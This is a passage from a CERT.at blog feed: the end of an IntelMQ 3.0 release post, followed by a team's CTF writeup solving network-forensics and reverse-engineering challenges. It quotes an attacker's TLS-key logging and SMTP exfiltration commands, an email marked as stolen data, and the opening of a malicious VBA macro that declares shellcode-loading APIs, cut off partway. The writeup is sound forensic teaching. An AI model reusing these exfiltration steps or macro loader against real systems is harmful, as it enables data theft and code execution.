&lt;p class=&quot;block&quot;&gt;An Aggregate Expert is now included in IntelMQ by default, allowing users to aggregate matching events within a configured time span. Aggregation means that single events will be discarded and the count of matching events in the time span is kept. The &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/bots.html#threshold&quot; target=&quot;_blank&quot;&gt;Threshold&lt;/a&gt; expert provides similar functionality, which passes an event when a configured threshold count is reached within the configured time span. This expert is a contribution by &lt;a href=&quot;https://github.com/creideiki&quot;&gt;Karl Johan Karlsson&lt;/a&gt; (liu.se).&lt;/p&gt;&#13;
&lt;h3&gt;n6 Integration&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;IntelMQ 3.0 integrates seamlessly with &lt;a href=&quot;https://n6.cert.pl/&quot;&gt;n6&lt;/a&gt;, an automated incident handling tool similar to IntelMQ, including bi-directional conversion of data formats. For more information, please see our &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/user/n6-integrations.html&quot; target=&quot;_blank&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h3&gt;Final note&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A detailed list of all changes can be found in the release notes, the full documentation is available at &lt;a href=&quot;https://intelmq.readthedocs.io/&quot;&gt;intelmq.readthedocs.io&lt;/a&gt;. As IntelMQ is a &lt;a href=&quot;https://github.com/certtools/intelmq&quot; target=&quot;_blank&quot;&gt;community project&lt;/a&gt;, every contribution is welcome. If you want to know more about &quot;How to create a bot&quot;, please check out our &lt;a href=&quot;https://intelmq.readthedocs.io/en/maintenance/dev/guide.html&quot; target=&quot;_blank&quot;&gt;Developer's Guide&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;ol&gt;&#13;
&lt;li id=&quot;an1&quot;&gt;&lt;a href=&quot;#anker1&quot;&gt;[1]&lt;/a&gt; RDAP is the successor of WHOIS using JSON as machine-readable data format.&lt;/li&gt;&#13;
&lt;/ol&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Mon, 02 Aug 2021 10:34:11 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/8/intelmq-30-domain-based-workflow-ieps</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-08-02T10:34:11Z</dc:date></item><item><title>FIRST Challenge 2021 Writeup</title><link>https://www.cert.at/en/blog/2021/6/first-challenge-2021-writeup</link><description>&lt;p class=&quot;block&quot;&gt;Due to the COVID-19 pandemic the FIRST conference 2021 moved online and so did the annual CTF organized by the &lt;a title=&quot;https://www.first.org/global/sigs/seclounge/&quot; href=&quot;https://www.first.org/global/sigs/seclounge/&quot;&gt;FIRST Security Lounge SIG&lt;/a&gt;. Thomas Pribitzer, Dimitri Robl, and Sebastian Waldbauer from CERT.at participated as a team, scoring the 9. place out of 42 teams. This post is a writeup of the challenges we were able to solve.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The challenges were organized into different categories and new challenges were released each day. However, the writeup will only reflect the categories, not the days they were published.&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#network&quot;&gt;Network&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#print-print&quot;&gt;print 'print'&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#aaaa&quot;&gt;AAAA&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#man-or-machine&quot;&gt;Man or Machine&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#the-secrets-of-a-dragon-fly-part-1&quot;&gt;The Secrets of a Dragon Fly [part 1]&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#email-exfil&quot;&gt;Email Exfil&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#sudo-su&quot;&gt;&lt;code&gt;sudo su&lt;/code&gt;&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#reverse-engineering&quot;&gt;Reverse Engineering&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#secret-document-13&quot;&gt;Secret document 1/3&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#secret-document-23&quot;&gt;Secret document 2/3&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#secret-document-33&quot;&gt;Secret document 3/3&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#file-in-the-wild-12&quot;&gt;File in the wild (1/2)&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#forensics&quot;&gt;Forensics&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#russian-dolls-12&quot;&gt;Russian Dolls (1/2)&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#russian-dolls-22&quot;&gt;Russian Dolls (2/2)&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#crhome-matser&quot;&gt;Crhome Matser&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#miscellaneous&quot;&gt;Miscellaneous&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#just-run-with-steve-j.&quot;&gt;Just run with Steve J.&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#my-man&quot;&gt;my man!&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#the-bit-maker&quot;&gt;The Bit Maker&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#cryptography-forensics&quot;&gt;Cryptography/Forensics&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#the-secret&quot;&gt;The Secret&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#ics&quot;&gt;ICS&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#hmi-pwning---1&quot;&gt;HMI Pwning - 1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#hiding-on-the-modbus---1&quot;&gt;Hiding on the Modbus - 1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#hiding-in-the-noise---1&quot;&gt;Hiding in the Noise - 1&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#web&quot;&gt;Web&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#clear-intentions&quot;&gt;Clear Intentions&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#permutation-lock&quot;&gt;Permutation Lock &lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#time-to-rest&quot;&gt;Time to REST&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#intern-dev-tango&quot;&gt;Intern Dev Tango&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#cryptography&quot;&gt;Cryptography&lt;/a&gt;&lt;/li&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#decode&quot;&gt;Decode&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#decode-2&quot;&gt;Decode 2&lt;/a&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;a href=&quot;#decode-3&quot;&gt;Decode 3&lt;/a&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2 id=&quot;network&quot;&gt;Network&lt;/h2&gt;&#13;
&lt;p&gt;In total there were seven challenges of which we solved six.&lt;/p&gt;&#13;
&lt;h3 id=&quot;print-print&quot;&gt;print &amp;lsquo;print&amp;rsquo;&lt;/h3&gt;&#13;
&lt;p&gt;This challenge involved analyzing a PCAP file. The description was:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Custom print, copy, and faxing services! And who said print media is dead?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Looking at the PCAP file, we could quickly locate an interesting HTTP POST request which said:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;POST /PDF HTTP/1.1&#13;
Content-Type: application/ipp&#13;
Date: Sun, 22 Dec 2019 16:56:10 GMT&#13;
Host: localhost:1234&#13;
Transfer-Encoding: chunked&#13;
User-Agent: CUPS/2.2.7 (Linux 4.15.0-65-generic; x86_64) IPP/2.0&#13;
Accept-Encoding: deflate, gzip, identity&#13;
Expect: 100-continue&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Its payload contained the following header:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;b7&#13;
.......*.G..attributes-charset..utf-8H..attributes-natural-language..enE..printer-uri.#ipp://printer.example.com/ipp/printB..requesting-user-name..I..document-format..application/pdf.&#13;
2ea1&#13;
PK&amp;middot;&amp;middot;&amp;middot;  &amp;middot;  &amp;middot;&amp;middot;&amp;middot;O3&amp;amp;&amp;middot;&amp;middot;/   /   &amp;middot;   mimetypeapplication/vnd.oasis.opendocument.presentation&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Ok, that looks strange &amp;ndash; the POST requests refers to a document called &lt;code&gt;PDF&lt;/code&gt;, it says &lt;code&gt;document- format..application/pdf&lt;/code&gt;, but the MIME type says something else. Having a look at &lt;a href=&quot;https://en.wikipedia.org/wiki/List_of_file_signatures&quot;&gt;the list of file signatures on Wikipedia&lt;/a&gt; told us that &lt;code&gt;PK&lt;/code&gt; is the start of the header &quot;for zip file format and formats based on it, such as EPUB, JAR, ODF, OOXML&quot; and that made an open document presentation more likely than a PDF. What does &lt;code&gt;file&lt;/code&gt; say?&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file PDF&#13;
PDF: Zip archive data, harset&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Well, not too helpful, so we removed everything until &lt;code&gt;PK&lt;/code&gt; from the header, renamed it to &lt;code&gt;PDF.odp&lt;/code&gt; and tried again:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file PDF.odp&#13;
PDF.odp: OpenDocument Presentation&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;That looks much better! Opening it with LibreOffice we found the flag&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;&lt;code&gt;printprintprintprint_Flag123!&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;on page 15.&lt;/p&gt;&#13;
&lt;h3 id=&quot;aaaa&quot;&gt;AAAA&lt;/h3&gt;&#13;
&lt;p&gt;Another PCAP and we&amp;rsquo;re told&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Your incident response team said they located a series of suspicious TCP connections. They&amp;rsquo;ve asked you to find the one which contains the flag. They also mentioned something about morse and binary encodings.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Looking through the PCAP, we found a lot of TCP connections, all of them containing variable amounts of the letter &lt;code&gt;A&lt;/code&gt;.&lt;/p&gt;&#13;
&lt;p&gt;Using the filter &lt;code&gt;tcp.stream == &amp;amp;&amp;amp; tcp.flags.push == 1&lt;/code&gt; where &lt;code&gt;&lt;/code&gt; is replaced by each TCP stream, we found that the packet lengths varied a lot, except for stream 20 which contains mainly packets which are either 67 or 166 bytes in size.&lt;/p&gt;&#13;
&lt;p&gt;We exported this stream to a CSV file, extracted the the length and converted it to ones and zeroes, where 67 maps to 0 and 166 maps to 1. This resulted in a stream of bits converted to ASCII read: &lt;code&gt;wowyoufoundthetimeseriesflag&lt;/code&gt;.&lt;/p&gt;&#13;
&lt;h3 id=&quot;man-or-machine&quot;&gt;Man or Machine&lt;/h3&gt;&#13;
&lt;p&gt;More PCAPs, obviously ;) The task was:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;This one is simple. There&amp;rsquo;s a pcap which contains 100 SSH connections. Only 1 on the connections was human driven. All we want to know is the source port number for that 1 connection.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;After opening the PCAP, we looked into the Statistics section in Wireshark which showed us that most connections contained roughly the same amount of traffic except for one which had a lot more. Its source port was 54712. However, that in itself was not enough to be sure, so we dug deeper.&lt;/p&gt;&#13;
&lt;p&gt;Comparing the I/O graphs of the connections showed us that most of them look extremely similar, except one &amp;ndash; again source port 54712. As connections from bot traffic should look very similar, this was was a good enough reason for us to assume that this connection was the one with a human behind a keyboard and we were correct.&lt;/p&gt;&#13;
&lt;h3 id=&quot;the-secrets-of-a-dragon-fly-part-1&quot;&gt;The Secrets of a Dragon Fly [part 1]&lt;/h3&gt;&#13;
&lt;p&gt;No PCAPs this time but a link to a website and a rather simple task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;What is the password?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;When connecting to the website (which contained the picture of a dragonfly, which explains the name) and examining the headers the following stood out:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;x-device-header: It looks like a computer desktop browser&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Switching to a mobile user agent string, returned a different header:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;x-proto-header: The year is 2021. IPv6 is widely adopted.&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Well, let&amp;rsquo;s try this again using IPv6. And voil&amp;agrave;, a new header:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;Congratulations: The password is 3HWvgPuu9uFILPqvp+8VvvrTZFc7hNHG&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;h3 id=&quot;email-exfil&quot;&gt;Email Exfil&lt;/h3&gt;&#13;
&lt;p&gt;Back to PCAP! This time the task was:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Your network traffic analysis engine triggered a high severity behavior anomaly alert. Your tier 1 SOC analysts could not identify what caused the alert. See if you can locate it and the flag!&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;The PCAP contains three TCP connections: one over telnet, one over SMTP and one via TLS. The telnet connection reveals the relevant information. First it tells us, what the attacker did on the machine and the two relevant commands were:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;PW=`SSLKEYLOGFILE=/.hidden/log.log curl &quot;https://www.passwordrandom.com/query?command=password&quot;`; qpdf foo.pdf --encrypt $PW $PW 256 -- enc_foo.pdf&#13;
python exfil.py&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;&lt;code&gt;exfil.py&lt;/code&gt;&amp;rsquo;s contents are also shown in the session, revealing a simple SMTP-exfil script which sends both &lt;code&gt;./hidden/log.log&lt;/code&gt; and &lt;code&gt;enc_foo.pdf&lt;/code&gt; to the attacker:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;Content-Type: multipart/mixed; boundary=&quot;===============5727638339489555207==&quot;\r\n&#13;
MIME-Version: 1.0\r\n&#13;
Subject: Check this out!\r\n&#13;
From: attacker@localhost\r\n&#13;
To: root@localhost\r\n&#13;
\r\n&#13;
--===============5727638339489555207==\r\n&#13;
Content-Type: multipart/alternative;\r\n&#13;
 boundary=&quot;===============1396928425997086772==&quot;\r\n&#13;
MIME-Version: 1.0\r\n&#13;
\r\n&#13;
--===============1396928425997086772==\r\n&#13;
Content-Type: text/plain; charset=&quot;us-ascii&quot;\r\n&#13;
MIME-Version: 1.0\r\n&#13;
Content-Transfer-Encoding: 7bit\r\n&#13;
\r\n&#13;
Alt Text\r\n&#13;
--===============1396928425997086772==\r\n&#13;
Content-Type: text/plain; charset=&quot;us-ascii&quot;\r\n&#13;
MIME-Version: 1.0\r\n&#13;
Content-Transfer-Encoding: 7bit\r\n&#13;
\r\n&#13;
This is the stolen data. See to it that it makes its way into the database.\r\n&#13;
--===============1396928425997086772==--\r\n&#13;
\r\n&#13;
--===============5727638339489555207==\r\n&#13;
Content-Type: application/octet-stream\r\n&#13;
MIME-Version: 1.0\r\n&#13;
Content-Transfer-Encoding: base64\r\n&#13;
Content-Disposition: attachment; filename=&quot;one.jpg&quot;\r\n&#13;
\r\n&#13;
Q0xJRU5UX1JBTkRPTSA2YjYxYjNmY2Q0NDA3NjIyODY5ZTRlNDQyOTZmYjc3MTBlMWY1YjE4OWYz\r\n&#13;
MWJjNzBhYTE4ZmYxYjYyNWE2MGYzIGNhNWEyNjE0YjY5NjgxNGRhMThjNWMxYTE1MzliOWZiZWNm\r\n&#13;
M2VmMzRjZWEwN2MwNGY2OTNjZDNmMjY1MWVjM2IzZmU4MWZkYjczYzA0MDc3MGEwZmEwOGE4NzEy\r\n&#13;
ZDk2Ywo=\r\n&#13;
\r\n&#13;
--===============5727638339489555207==\r\n&#13;
Content-Type: application/octet-stream\r\n&#13;
MIME-Version: 1.0\r\n&#13;
Content-Transfer-Encoding: base64\r\n&#13;
Content-Disposition: attachment; filename=&quot;two.jpg&quot;\r\n&#13;
\r\n&#13;
[SNIP]&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;After extracting both &lt;code&gt;.jpg&lt;/code&gt; files from the SMTP stream and decoded the base64, we got:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ file {one,two}.jpg&#13;
one.jpg: ASCII text&#13;
two.jpg: PDF document, version 1.7&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And of course, when we try to open the PDF we&amp;rsquo;re asked for a password which we don&amp;rsquo;t have yet. However, &lt;code&gt;one.jpg&lt;/code&gt; contains the logfile which can be used to decrypt TLS traffic by simply setting the &lt;code&gt;SSLKEYLOGFILE&lt;/code&gt; variable accordingly. We can now use &lt;code&gt;tshark&lt;/code&gt; to get our password. First, we have to find the packet we&amp;rsquo;re interested in:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ SSLKEYLOGFILE=one.jpg tshark -r email-exfil.pcap -Y &quot;ssl&quot;&#13;
  203  23.638954    10.0.3.15 37806 205.144.171.63 443 TLSv1 573 Client Hello&#13;
  205  23.696214 205.144.171.63 443 10.0.3.15    37806 TCP 1396 [TCP segment of a reassembled PDU]&#13;
  207  23.697224 205.144.171.63 443 10.0.3.15    37806 TLSv1.2 1775 Server Hello, Certificate, Server Key Exchange, Server Hello Done&#13;
  209  23.701477    10.0.3.15 37806 205.144.171.63 443 TLSv1.2 214 Client Key Exchange, Change Cipher Spec, Finished&#13;
  211  23.756376 205.144.171.63 443 10.0.3.15    37806 HTTP2 176 SETTINGS[0], WINDOW_UPDATE[0]&#13;
  212  23.756894    10.0.3.15 37806 205.144.171.63 443 HTTP2 109 Magic&#13;
  213  23.757075    10.0.3.15 37806 205.144.171.63 443 HTTP2 112 SETTINGS[0]&#13;
  215  23.757209    10.0.3.15 37806 205.144.171.63 443 HTTP2 98 WINDOW_UPDATE[0]&#13;
  218  23.757385    10.0.3.15 37806 205.144.171.63 443 HTTP2 149 HEADERS[1]: GET /query?command=password&#13;
  219  23.757498    10.0.3.15 37806 205.144.171.63 443 HTTP2 94 SETTINGS[0]&#13;
  222  23.808444 205.144.171.63 443 10.0.3.15    37806 HTTP2 94 SETTINGS[0]&#13;
  223  23.838464 205.144.171.63 443 10.0.3.15    37806 HTTP2 292 HEADERS[1]: 200 OK, DATA[1], DATA[1] (text/plain)&#13;
  258  23.849585    10.0.3.15 37806 205.144.171.63 443 TLSv1.2 87 Alert (Level: Warning, Description: Close Notify)&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Well, packet 223 contains a reply in &lt;code&gt;text/plain&lt;/code&gt;, so:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ SSLKEYLOGFILE=one.jpg tshark -r email-exfil.pcap -Y &quot;http2 &amp;amp;&amp;amp; frame.number == 223&quot; -x&#13;
[SNIP]&#13;
Reassembled body (11 bytes):&#13;
0000  52 61 6f 4c 59 39 3a 33 30 77 6a                  RaoLY9:30wj&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;This looks like our password, so let&amp;rsquo;s try it out:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ qpdf --decrypt two.jpg --password='RaoLY9:30wj' decrpted.pdf&#13;
$ pdf2txt decrypted.pdf&#13;
YouFoundThisFlag!_Congrats!&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;h3 id=&quot;sudo-su&quot;&gt;&lt;code&gt;sudo su&lt;/code&gt;&lt;/h3&gt;&#13;
&lt;p&gt;Another PCAP \o/. Our task says:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;This is another easy one. The pcap contains a single ssh session. The user authenticated with a public key. The user was then provided a pseudo-terminal on the server. The user entered the &quot;sudo su&quot; command. The user then typed their passowrd and successfully elevated to root. The user then pressed CTL+D twice which exited first the root and then the user&amp;rsquo;s ssh session.&lt;/p&gt;&#13;
&lt;p&gt;All we want to know is the length of the user&amp;rsquo;s password. It&amp;rsquo;s a number.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Basically, this is an exercise in counting: Using the very helpful article &lt;a class=&quot;uri&quot; href=&quot;https://www.trisul.org/blog/traffic-analysis-of-secure-shell-ssh/&quot;&gt;https://www.trisul.org/blog/traffic-analysis-of-secure-shell-ssh/&lt;/a&gt; we analyzed the connection. First, we determined which algorithm was used:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ tshark -r sudo_su.pcap  -T fields -e ssh.encryption_algorithms_server_to_client -e ssh.encryption_algorithms_client_to_server -E header=y -VVV | grep -v '^[[:space:]]*$'&#13;
ssh.encryption_algorithms_server_to_client      ssh.encryption_algorithms_client_to_server&#13;
chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com    chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com&#13;
chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com    chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Ok, so both list &lt;code&gt;chacha20-poly1305@openssh.com&lt;/code&gt; as their first choice. The article says that packets containing a single keystroke encrypted with this algorithm have an encrypted size of 36 bytes and as there are a lot of packets containing 36 bytes, this is our algorithm. How many of those do we have?&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ tshark -r sudo_su.pcap  'tcp.len == 36 &amp;amp;&amp;amp; tcp.dstport == 22' | wc -l&#13;
18&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;In case you wonder: Filtering for the destination port is necessary because each keystroke is sent twice &amp;ndash; once from the client to the server and then echoed back from the server to the client so that it appears on their screen. Thus, we have 18 keystrokes, which we can break down further:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;sudo su&lt;/code&gt; + ENTER, i.e. 8&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;The password + ENTER&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;CTRL-D twice.&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;So it seems the password has &lt;span class=&quot;math inline&quot;&gt;18 &amp;minus; 8 &amp;minus; 1 &amp;minus; 2 = 7&lt;/span&gt; characters. However, to be absolutely sure, we created an SSH session in our network using passwords we knew and sniffed the traffic. It turned out that this technique counts one byte to much, presumably because the last CTRL-D sends an additional logoff command and thus counts for two keystrokes.&lt;/p&gt;&#13;
&lt;p&gt;Therefore, the final answer was that the password has six characters.&lt;/p&gt;&#13;
&lt;h2 id=&quot;reverse-engineering&quot;&gt;Reverse Engineering&lt;/h2&gt;&#13;
&lt;p&gt;This part contained seven challenges of which we solved four.&lt;/p&gt;&#13;
&lt;h3 id=&quot;secret-document-13&quot;&gt;Secret document 1/3&lt;/h3&gt;&#13;
&lt;p&gt;We&amp;rsquo;re given a file with the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;&lt;strong&gt;For your eyes onl!!&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;Guys,&lt;/p&gt;&#13;
&lt;p&gt;We have received this document that content very sensitive informations.&lt;/p&gt;&#13;
&lt;p&gt;As our policy require to block macros, we need your help to discover the secret stored in the document.&lt;/p&gt;&#13;
&lt;p&gt;Someone says that this document retrieve it&amp;rsquo;s content* from an IP*, can you spot which one?&lt;/p&gt;&#13;
&lt;p&gt;Thanks!&lt;/p&gt;&#13;
&lt;p&gt;P.S: password for document is &quot;infected&quot;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;The file we received was a password-protected 7z file:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ 7z x -pinfected document.7z &#13;
&#13;
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21&#13;
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI)&#13;
&#13;
Scanning the drive for archives:&#13;
1 file, 154242 bytes (151 KiB) &#13;
&#13;
Extracting archive: document.7z&#13;
--&#13;
Path = document.7z&#13;
Type = 7z &#13;
Physical Size = 154242&#13;
Headers Size = 194&#13;
Method = LZMA2:192k 7zAES&#13;
Solid = -&#13;
Blocks = 1&#13;
&#13;
Everything is Ok&#13;
&#13;
Size:       166575&#13;
Compressed: 154242&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;To inspect the macros we used &lt;a href=&quot;https://blog.didierstevens.com/my-software/#oledump&quot;&gt;Didier Steven&amp;rsquo;s &lt;code&gt;oledump.py&lt;/code&gt;&lt;/a&gt;:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ python2 oledump.py -i 'TOP SECRET -- For Your Eyes Only.docm'&#13;
A: word/vbaProject.bin&#13;
 A1:       412 'PROJECT'&#13;
 A2:        71 'PROJECTwm'&#13;
 A3: M   22157 'VBA/NewMacros'&#13;
 A4: m    1129 'VBA/ThisDocument'&#13;
 A5:      3180 'VBA/_VBA_PROJECT'&#13;
 A6:      1672 'VBA/__SRP_0'&#13;
 A7:       287 'VBA/__SRP_1'&#13;
 A8:      8586 'VBA/__SRP_2'&#13;
 A9:       405 'VBA/__SRP_3'&#13;
A10:       224 'VBA/__SRP_4'&#13;
A11:        66 'VBA/__SRP_5'&#13;
A12:       577 'VBA/dir'&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;This tells us, that the macro is in stream &lt;code&gt;A3&lt;/code&gt;, so let&amp;rsquo;s extract it:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ python2 oledump.py -s A3 -v 'TOP SECRET -- For Your Eyes Only.docm'&#13;
Attribute VB_Name = &quot;NewMacros&quot;&#13;
#If VBA7 Then&#13;
        Private Declare PtrSafe Function CreateThread Lib &quot;kernel32&quot; (ByVal Yui As Long, ByVal Ishjn As Long, ByVal Iyjoknq As LongPtr, Bfstulfe As Long, ByVal Ztdx As Long, Ajuzag As Long) As LongPtr&#13;
        Private Declare PtrSafe Function VirtualAlloc Lib &quot;kernel32&quot; (ByVal Rwsmgf As Long, ByVal Yfhfyt As Long, ByVal Gmv As Long, ByVal Fzuyvr As Long) As LongPtr&#13;
        Private Declare PtrSafe Function RtlMoveMemory Lib &quot;kernel32&quot; (ByVal Dsxwyr As LongPtr, ByRef Ulfjrsim As Any, ByVal Qaozt As Long) As LongPtr&#13;
#Else&#13;
        Private Declare Function CreateThread Lib &quot;kernel32&quot; (ByVal Yui As Long, ByVal Ishjn As Long, ByVal Iyjoknq As Long, Bfstulfe As Long, ByVal Ztdx As Long, Ajuzag As Long) As Long&#13;
